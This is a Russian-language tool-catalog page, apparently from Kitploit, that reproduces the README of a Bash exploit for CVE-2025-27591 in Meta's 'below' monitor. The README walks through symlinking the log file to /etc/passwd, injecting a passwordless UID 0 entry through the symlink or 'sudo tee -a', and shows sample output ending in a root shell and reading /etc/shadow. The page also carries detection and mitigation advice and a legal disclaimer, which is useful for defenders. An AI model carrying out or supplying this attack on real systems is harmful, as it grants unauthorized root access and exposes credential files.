Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Эксплойт повышения привилегий на базе Bash, нацеленный на инструмент системного мониторинга производительности `below`. Этот обновлённый эксплойт использует уязвимость символьной ссылки в механизме ведения журнала, чтобы внедрить root-пользователя в `/etc/passwd`, обеспечивая полный доступ root. | Kitploit
Инструменты/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Эксплойт повышения привилегий на базе Bash, нацеленный на инструмент системного мониторинга производительности `below`. Этот обновлённый эксплойт использует уязвимость символьной ссылки в механизме ведения журнала, чтобы внедрить root-пользователя в `/etc/passwd`, обеспечивая полный доступ root.

Поделиться
Репозиторий
2110 месяцев назадЕщё не проверено

Buy me a knowledge

CVE-2025-27591 Эксплойт — Атака через симлинк на логгер Below

Эксплойт для повышения привилегий на базе Bash, нацеленный на инструмент мониторинга производительности системы below. Этот модернизированный эксплойт использует уязвимость симлинков в механизме логирования для внедрения пользователя с правами root в /etc/passwd, получая полный доступ root.

Авторы

Обнаружено и сообщено Matthias Gerstner @ SUSE — Security Advisory

Детали уязвимости

  • CVE: CVE-2025-27591
  • Уязвимый компонент: /usr/bin/below (монитор производительности системы от Facebook)
  • Уязвимые версии: Версии below с общедоступными для записи каталогами логов
  • Тип уязвимости: Атака через симлинк / Повышение привилегий
  • Вектор атаки: /var/log/below/error_root.log → /etc/passwd
  • Оценка CVSS: Высокая (Повышение привилегий до root)

Обзор

Инструмент мониторинга below записывает ошибки в /var/log/below/error_root.log при работе с повышенными привилегиями. Если каталог логов общедоступен для записи, атакующий может:

  1. Создать символическую ссылку с error_root.log на /etc/passwd
  2. Запустить команду below record, чтобы записать сообщения об ошибках в симлинк
  3. Вручную внедрить вредоносную запись пользователя с UID=0 (привилегии root)
  4. Получить оболочку root, используя созданного пользователя

Этот эксплойт автоматизирует весь процесс с интеллектуальными механизмами отката для работы с различными конфигурациями системы.

Схема работы эксплойта

root@kitploit:~
flowchart TD
    A[Начало эксплойта] --> B[Получить имя пользователя от пользователя]
    B --> C{Проверить /var/log/below<br/>общедоступен для записи?}
    C -->|Нет| D[Выход: не уязвим]
    C -->|Да| E[Удалить существующий error_root.log]
    E --> F[Создать симлинк:<br/>error_root.log → /etc/passwd]
    F --> G{Симлинк создан<br/>успешно?}
    G -->|Нет| D
    G -->|Да| H[Выполнить: sudo below record]
    H --> I[Подождать 3 секунды для логирования]
    I --> J[Убить процесс below]
    J --> K{Полезная нагрузка в<br/>/etc/passwd?}
    K -->|Да| M[Путь успеха]
    K -->|Нет| L[Попытка ручного внедрения:<br/>echo payload >> symlink]
    L --> N{Ручное внедрение<br/>успешно?}
    N -->|Нет| O[Попробовать запасной вариант:<br/>sudo tee -a]
    N -->|Да| M
    O --> P{Запасной вариант<br/>успешен?}
    P -->|Нет| D
    P -->|Да| M
    M --> Q[Проверить полезную нагрузку в /etc/passwd]
    Q --> R[Отключить очистку trap]
    R --> S[Выполнить: su username]
    S --> T[Получена оболочка root]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

Технические детали

Шаги эксплуатации

  1. Фаза предварительной проверки

    • Проверить, существует ли каталог /var/log/below
    • Проверить, есть ли у каталога права на запись для всех (o+w)
    • Проверить возможность создания симлинка
  2. Фаза настройки

    • Удалить существующий файл error_root.log (если есть)
    • Создать символическую ссылку: /var/log/below/error_root.log → /etc/passwd
    • Проверить, что симлинк указывает на правильную цель
  3. Фаза внедрения (основной метод)

    • Запустить sudo below record в фоне
    • Дать процессу поработать 3 секунды для записи ошибок
    • Убить процесс, чтобы избежать непрерывного логирования
    • Проверить, повредили ли сообщения об ошибках /etc/passwd полезным образом
  4. Фаза внедрения (запасные методы)

    • Метод 1: Прямое добавление через симлинк (echo >> symlink)
    • Метод 2: Использование sudo с tee (sudo tee -a)
  5. Фаза запуска оболочки

    • Проверить, что вредоносный пользователь существует в

Структура полезной нагрузки

Внедряемая запись /etc/passwd имеет следующий формат:

root@kitploit:~
username::0:0:username:/root:/bin/bash

Расшифровка полей:

  • username: Имя пользователя, введённое пользователем (по умолчанию "0xdtc")
  • ::: Пустое поле пароля (пароль не требуется)
  • 0:0: UID=0, GID=0 (привилегии root)
  • username: Поле GECOS (описание пользователя)
  • /root: Домашний каталог
  • /bin/bash: Оболочка входа

Предварительные требования

  • Целевая система работает с уязвимым бинарным файлом below
  • Каталог /var/log/below должен быть общедоступен для записи
  • Пользователь должен иметь доступ к sudo для выполнения below record
  • Среда оболочки Bash

Использование

Базовый запуск

root@kitploit:~
# Сделать скрипт исполняемым
chmod +x CVE-2025-27591

# Запустить эксплойт
./CVE-2025-27591

Интерактивные запросы

root@kitploit:~
========================================
  CVE-2025-27591 Эксплойт (Bash)
========================================

[*] Этот эксплойт создаст нового пользователя root в /etc/passwd
[?] Введите имя пользователя для нового root-пользователя (по умолчанию: 0xdtc): myuser
[+] Используется имя пользователя: myuser

Пример вывода

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Эксплойт (Bash)
========================================

[*] Этот эксплойт создаст нового пользователя root в /etc/passwd
[?] Введите имя пользователя для нового root-пользователя (по умолчанию: 0xdtc): 0xdtc
[+] Используется имя пользователя: 0xdtc

[*] Проверка на уязвимость CVE-2025-27591
[+] /var/log/below общедоступен для записи
[*] Тестирование создания симлинка
[+] Тест симлинка успешен
[+] Цель уязвима

[*] Начало эксплуатации
[+] Полезная нагрузка записана в /tmp/exploit_payload
[*] Создание симлинка: /var/log/below/error_root.log -> /etc/passwd
[+] Симлинк создан
[*] Выполнение 'sudo below record' для запуска логирования
[*] Запущен 'below record' с PID: 12345
[*] Проверка, была ли записана полезная нагрузка
[*] Попытка ручного внедрения
[*] Добавление полезной нагрузки в /etc/passwd через симлинк
[+] Полезная нагрузка добавлена
[+] Эксплуатация завершена! Полезная нагрузка в /etc/passwd
[*] Запуск оболочки root через 'su 0xdtc'
[*] Пароль должен быть пустым, просто нажмите Enter

root@kali:/tmp# whoami
root

Возможности

Интеллектуальная обработка препятствий

Скрипт включает несколько запасных механизмов для работы с различными конфигурациями системы:

  1. Обработка существующих файлов

    • Автоматически обнаруживает и удаляет существующие файлы логов
    • Работает как с обычными файлами, так и с существующими симлинками
    • Проверяет цель симлинка перед продолжением
  2. Несколько методов внедрения

    • Основной: Запуск через логирование ошибок below record
    • Запасной 1: Прямое добавление к симлинку
    • Запасной 2: Запись с повышенными правами через sudo tee
  3. Управление процессами

    • Автоматически убивает зависшие процессы below
    • Предотвращает истощение ресурсов
    • Обрабатывает очистку процессов при сбое
  4. Обнаружение повторного запуска

    • Проверяет, существует ли уже полезная нагрузка в /etc/passwd
    • Пропускает эксплуатацию, если пользователь уже создан
    • При повторном запуске сразу запускает оболочку

Особенности качества кода

  • Подробные комментарии: Каждая функция и критический шаг задокументированы
  • Заголовки разделов: Код организован в логические секции
  • Обработка ошибок: Правильная проверка ошибок и обратная связь пользователю
  • Чистый выход: Обработчики trap для корректной очистки при сбое
  • Минимальные зависимости: Чистый Bash со стандартными инструментами Unix

Структура файлов

root@kitploit:~
.
├── CVE-2025-27591           # Основной скрипт эксплуатации
├── README.md           # Эта документация
└── /tmp/exploit_payload # Временный файл полезной нагрузки (создаётся во время выполнения)

Проверка

После успешной эксплуатации проверьте доступ root:

root@kitploit:~
# Проверить текущего пользователя
root@target:/tmp# whoami
root

# Проверить ID пользователя и группы
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Проверить пользователя в /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Прочитать файлы, доступные только root
root@target:/tmp# cat /etc/shadow
[... содержимое файла shadow ...]

Очистка

Если вам нужно удалить вредоносного пользователя после тестирования:

root@kitploit:~
# Удалить внедрённого пользователя из /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd

# Удалить оставшиеся симлинки
rm -f /var/log/below/error_root.log

Замените username на фактическое имя пользователя, которое вы использовали при эксплуатации.

Обнаружение и смягчение

Методы обнаружения

  1. Мониторинг целостности файлов

    root@kitploit:~
    # Отслеживать несанкционированные изменения в /etc/passwd
    aide --check
    
  2. Обнаружение симлинков

    root@kitploit:~
    # Проверить подозрительные симлинки в каталогах логов
    find /var/log -type l -ls
    
  3. Журналы аудита

    root@kitploit:~
    # Проверить подозрительное использование sudo
    grep "below record" /var/log/auth.log
    

Стратегии смягчения

  1. Исправить права каталога

    root@kitploit:~
    # Удалить право на запись для всех из каталога логов
    sudo chmod 755 /var/log/below
    
  2. Политики AppArmor/SELinux

    • Внедрить обязательный контроль доступа
    • Ограничить места записи файлов для бинарного файла below
  3. Обновить Below

    • Применить исправления безопасности от Facebook/Meta
    • Использовать обновления пакетного менеджера
  4. Мониторинг /etc/passwd

    • Настроить мониторинг целостности файлов (AIDE, Tripwire)
    • Оповещать о добавлении пользователей с UID=0

Юридическое предупреждение

Этот эксплойт предназначен только для образовательных целей и авторизованного тестирования на проникновение.

Несанкционированный доступ к компьютерным системам является незаконным. Используйте этот инструмент только на системах, где у вас есть явное разрешение на проведение тестирования безопасности. Автор(ы) не несут ответственности за неправомерное использование этого инструмента.

Используя этот эксплойт, вы подтверждаете, что:

  • У вас есть надлежащие разрешения на тестирование целевой системы
  • Вы понимаете применимые законы и нормативные акты
  • Вы принимаете на себя полную ответственность за свои действия

Репозиторий: https://github.com/0xDTC/ Автор: Divine Clown (0xDTC) Лицензия: Только для образовательного использования Последнее обновление: 2025-11-13

Скачать инструмент
/etc/passwd
  • Отключить очистку trap, чтобы предотвратить удаление
  • Выполнить su <username> для получения оболочки root